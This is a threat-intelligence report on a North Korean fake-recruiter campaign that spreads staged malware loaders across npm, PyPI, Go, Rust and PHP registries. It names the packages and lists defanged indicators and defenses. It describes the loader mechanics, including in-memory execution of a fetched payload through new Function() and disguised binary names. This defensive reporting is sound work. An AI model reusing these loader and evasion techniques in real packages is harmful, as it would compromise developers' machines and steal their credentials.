Contagious Interview goes cross-ecosystem: DPRK staged loaders hit npm, PyPI, Go, Rust, and PHP

The Contagious Interview operation — a long-running North Korean campaign that sends fake recruiter messages to software developers and hands them a "technical test" that is actually malware — has crossed a threshold. A newly reported package cluster, first identified by Socket, spreads a coordinated set of staged loaders across npm, PyPI, Go Modules, crates.io, and Packagist simultaneously. Publishing to five ecosystems under coordinated GitHub aliases is not an accident of tooling. It is a deliberate coverage strategy: a developer who reaches one malicious package on one registry and quarantines it may install a sibling package on a second registry without knowing they're pulling from the same campaign infrastructure. The Windows build of one package in this cluster — license-utils-kit on PyPI — drops a full post-compromise toolkit including shell access, keylogging, browser credential extraction, and AnyDesk-based persistent remote access. The thin-loader stage has hands-on intrusion capability attached.

Background: what Contagious Interview is

Contagious Interview (also tracked as FriendlyFerret, CL-STA-0240, and loosely associated with the Lazarus Group's IT-worker sub-cluster) has been operating since at least 2023. The campaign's social-engineering vector is consistent: a North Korean operator poses as a recruiter on LinkedIn, GitHub, or freelance platforms; initiates a job interview; and at some point asks the developer to clone a repository and run code locally as part of a "technical assessment" or "coding challenge." The code is the malware.

The payload family has evolved across three generations:

• BeaverTail — a JavaScript-based infostealer typically delivered as a trojanized npm package or as a fake Electron app. Targets browser credential stores, crypto wallet files, SSH keys, and cloud credentials. Has been found masquerading as video conferencing utilities and coding environment helpers.
• InvisibleFerret — a Python-based backdoor deployed as BeaverTail's second stage. Provides command execution, file upload/download, keylogging, and clipboard capture. Persists via cron, LaunchAgent (macOS), or startup registry entries.
• OtterCookie — a newer JavaScript-based payload observed from late 2024 onward, delivered via npm packages. Establishes a Socket.IO-based C2 channel and uses a JSON Web Token shared secret for authentication. Designed for persistent command-and-control rather than one-time credential theft.

The 2026 cluster reported by Socket extends this pattern into four additional ecosystems (Go, Rust, PHP, PyPI) while maintaining npm as the JavaScript delivery surface. The multi-ecosystem reach is the operational evolution.

The 2026 cluster: packages and personas

Socket identified packages published under three coordinated GitHub aliases — golangorg, aokisasakidev, and aokisasakidev1 — with a fourth alias (maxcointech1010) used for a GitHub account populated with cloned repositories across AI, blockchain, and developer tooling themes. The cloned repositories appear designed to lend the alias credibility rather than to publish packages directly.

npm:

• dev-log-core
• pino-debugger
• debug-fmt
• debug-glitz
• logger-base — dormant/sleeper at time of analysis
• logkitx — dormant/sleeper at time of analysis

PyPI:

• logutilkit
• apachelicense
• fluxhttp
• license-utils-kit

Go Modules:

• github.com/golangorg/formstash
• github.com/aokisasakidev/mit-license-pkg

Rust (crates.io):

• logtrace

PHP (Packagist):

• golangorg/logkit

Payload mechanics

The Python, Go, Rust, and PHP branches share a common staged-loader workflow:

1. Call out to attacker-controlled staging infrastructure to retrieve a payload URL.
2. Convert any Google Drive share link to a direct-download URL.
3. Pull a ZIP archive — typically named ecw_update.zip — and extract it into a hardcoded temporary directory named 410BB449A-72C6-4500-9765-ACD04JBV827V32V.
4. Execute a platform-specific second-stage binary: systemd-resolved on Linux (name impersonates the systemd resolver), com.apple.systemevents on macOS (name impersonates an Apple process), and py.exe on Windows.

The trigger functions — log(), find_by_key(), trace(), CheckForUpdates() — are named to look like ordinary library behavior. Reviewers who skim the package's public API surface see plausible utility code. The malicious staging call is embedded in these methods.

The npm branch works differently. Rather than staging a ZIP to disk, dev-log-core sends a POST request to a remote endpoint, base64-decodes the response body, and executes it via new Function(require, decodedCode)(require). This technique — server-supplied arbitrary JavaScript evaluated inside the host Node.js process — has no local artifact to scan. No file is written before the payload executes. The entire second stage exists only in the HTTP response and in memory.

The new Function() eval pattern is designed to defeat local artifact scanning. The payload isn't in the package tarball; it's fetched fresh from the operator's server at execution time. This means a clean hash on the installed package is not evidence of safety — if the C2 server is live and returning a payload, the package is weaponized regardless of what the tarball contains.

license-utils-kit: the full-capability variant

license-utils-kit on PyPI stands apart from the rest of the cluster. On Linux and macOS it behaves as a standard staged loader (Google Drive staging, ecw_update.zip, platform binary). On Windows it bundles a substantially more capable implant:

• Shell access — remote command execution
• Keylogging — keystroke capture
• Browser credential and session extraction — targeting Chromium-family browsers
• Cryptocurrency wallet extraction — targeting common desktop wallet files
• File harvesting and encrypted exfiltration archives
• AnyDesk-based persistent remote access — leveraging the legitimate AnyDesk remote desktop client as a persistence and access mechanism to avoid triggering "unknown binary" defenses
• Separate C2 channel — direct connection to 66[.]45[.]225[.]94, bypassing the staging-infrastructure indirection used by other packages in the cluster

The Windows build effectively combines the BeaverTail credential-theft profile with an InvisibleFerret-style backdoor and AnyDesk-based remote-operator access into a single package. The social-engineering implication is significant: a Windows developer who installs this as part of a "technical assessment" hands the operator a persistent remote access session, not just a one-time credential dump.

Social-engineering vector

Contagious Interview's delivery mechanism is distinct from the supply-chain attacks documented in the TeamPCP and Shai-Hulud clusters. Those campaigns compromise existing trusted packages and wait for downstream consumers to install them passively. Contagious Interview recruits the victim: the developer is approached via LinkedIn or a freelance platform, cultivated over multiple messages, and eventually directed to clone a repository or install a package as part of an interview process.

This means the campaign specifically targets developers who are actively job-seeking or open to freelance work — a population that will accept unsolicited package-installation requests that a non-interview context would make suspicious. The technical-test framing normalizes running unfamiliar code locally. Developers who would never run npm install <unknown-package> in production may do exactly that when told it's a screening exercise from a recruiter.

Common recruitment signals associated with this campaign:

• Recruiter messages referencing AI, blockchain, fintech, or crypto projects — sectors that match the fake-repository themes used by maxcointech1010
• Requests to "run a quick test project" or "review this demo repo" as part of the interview process, especially if the request arrives on a timeline that discourages careful review
• GitHub profiles with many cloned or forked repositories across AI/crypto/ML themes but no meaningful commit history to any of them
• Contact originating from platforms where identity verification is weak (LinkedIn, GitHub, freelance marketplaces)

Indicators of compromise

Malicious packages (all ecosystems):

• npm: dev-log-core, pino-debugger, debug-fmt, debug-glitz, logger-base, logkitx
• PyPI: logutilkit, apachelicense, fluxhttp, license-utils-kit
• Go: github.com/golangorg/formstash, github.com/aokisasakidev/mit-license-pkg
• crates.io: logtrace
• Packagist: golangorg/logkit

Filesystem artifacts:

• ecw_update.zip in any temporary directory
• Directory named 410BB449A-72C6-4500-9765-ACD04JBV827V32V
• Files named start.py, systemd-resolved (in non-systemd paths), com.apple.systemevents (in non-Apple paths), or py.exe
• AnyDesk installed on a developer workstation that the user did not install

Network indicators (defanged):

• apachelicense[.]vercel[.]app
• ngrok-free[.]vercel[.]app
• logkit[.]onrender[.]com
• logkit-tau[.]vercel[.]app
• 66[.]45[.]225[.]94 — direct C2 IP (license-utils-kit Windows variant)
• Suspicious Google Drive direct-download patterns from non-browser processes

Behavioral signals:

• Outbound HTTP to Vercel or Render endpoints from a process spawned during npm install or pip install
• ZIP archive download and extraction into a randomized directory name during package install
• new Function() execution pattern in Node.js processes spawned by npm lifecycle hooks
• AnyDesk process running without corresponding user-initiated installation

Detection and mitigation

• Audit all five ecosystems in your dependency trees. Check package.json / lockfiles, requirements.txt / poetry.lock, go.mod / go.sum, Cargo.toml / Cargo.lock, and composer.json for any of the listed package names. Recent build history matters — a package may have been removed from the current tree but was present in a prior build that ran on a CI runner.
• Treat any host that installed these packages as compromised. Rotate cloud credentials (AWS/Azure/GCP), GitHub tokens, npm and PyPI publish tokens, SSH keys, Kubernetes service account tokens, and any secrets in environment variables. The malware enumerates broadly; assume everything reachable from the host was exfiltrated.
• Search for filesystem artifacts listed above, particularly ecw_update.zip and the hardcoded extraction directory. The presence of either confirms payload execution.
• Block the listed C2 endpoints at the network perimeter. The direct IP 66[.]45[.]225[.]94 and the Vercel/Render staging domains are clean blocks that don't risk breaking legitimate traffic.
• Enable npm install script blocking by default in CI (npm ci --ignore-scripts). Allowlist packages that genuinely require lifecycle hooks. The dev-log-core postinstall path is blocked entirely by this flag.
• Educate developers on the recruitment vector. The social-engineering approach means developer awareness is a genuine control here — unusual for supply-chain attacks. A developer who knows to treat "run this test repo" as a red flag reduces the campaign's effective surface.
• Investigate unauthorized AnyDesk installations. On Windows, the presence of AnyDesk installed without user action on a developer workstation — especially one that recently ran a job-interview coding test — should be treated as evidence of active intrusion, not just initial compromise.

Attribution

Socket attributes this cluster to North Korea's Contagious Interview operation based on TTP continuity: the staged Google Drive loader pattern, the BeaverTail/InvisibleFerret toolchain, the AI/crypto/developer-tooling cover personas, and the social-engineering recruitment vector. These are consistent with activity CrowdStrike tracks as Famous Chollima, Mandiant tracks under UNC4736/UNC2970, and the broader Lazarus Group IT-worker umbrella. The multi-ecosystem reach represents a tactical evolution but not a change in underlying infrastructure or targeting logic.

Attribution to North Korea in this context is well-supported: FBI and CISA have issued multiple advisories attributing Contagious Interview to DPRK-affiliated IT workers. The operational goal is currency generation — stolen credentials and persistent access convert into cryptocurrency theft and market manipulation. Developer workstations and CI/CD runners are the preferred targets because they hold both the credentials to access financial platforms and the ability to push code to production.

Criminal-market signal

Dark-web sweeps run on May 6, 2026 found no criminal-market presence for this campaign on publicly-observable venues.

The absence is structural, not circumstantial. Contagious Interview is a North Korean state operation with a specific monetization model: stolen credentials and persistent access feed DPRK's cryptocurrency theft program directly. The attack tooling — BeaverTail, InvisibleFerret, OtterCookie — is not a product. There is no market because there is no seller. The credentials go to the state; the capability stays internal. This pattern holds across every documented DPRK cyber operation and is unlikely to change regardless of how many sweeps are run or how much time passes.

Criminal-market monitoring provides no early warning for this campaign class. The social-engineering recruitment vector — fake recruiter, coding interview, install this repo — is the detection surface. Awareness training that specifically covers the fake-recruiter pattern is a required complement to any technical control, because the developer may intentionally install the malicious package believing it is a legitimate interview task.

What distinguishes this from the TeamPCP cluster

Both Contagious Interview and TeamPCP are active supply-chain campaigns operating in 2026 with overlapping technical tactics (staged loaders, credential theft, multi-ecosystem publishing). The meaningful distinctions for defenders:

• Initial access vector: TeamPCP compromises existing trusted packages via stolen CI/CD credentials, relying on passive installation by downstream consumers. Contagious Interview deploys fresh packages and actively recruits the first victim via social engineering. TeamPCP's blast radius is larger (2M-download packages); Contagious Interview's targeting is more intentional (developers in AI/crypto/fintech).
• Operator motivation: TeamPCP exfiltrates credentials and may sell or reuse them. Contagious Interview exfiltrates credentials and converts them directly to cryptocurrency theft — a state-level monetization operation, not a criminal market vendor.
• Persistence model: TeamPCP payloads are designed for quick credential sweep and worm propagation. The license-utils-kit Windows build is designed for sustained hands-on access via AnyDesk. The DPRK campaign expects to sit inside developer environments for extended periods.

Defenders who monitor supply-chain registries for postinstall hooks and unexpected dependencies will catch both campaigns at the package level. But Contagious Interview's social-engineering entry point means the malicious package installation may be intended by the developer — standard SCA alerting on an unknown package may be dismissed as a false positive if the developer believes they're running a legitimate interview test. Awareness training that specifically covers the fake-recruiter pattern is a required complement to technical controls for this campaign.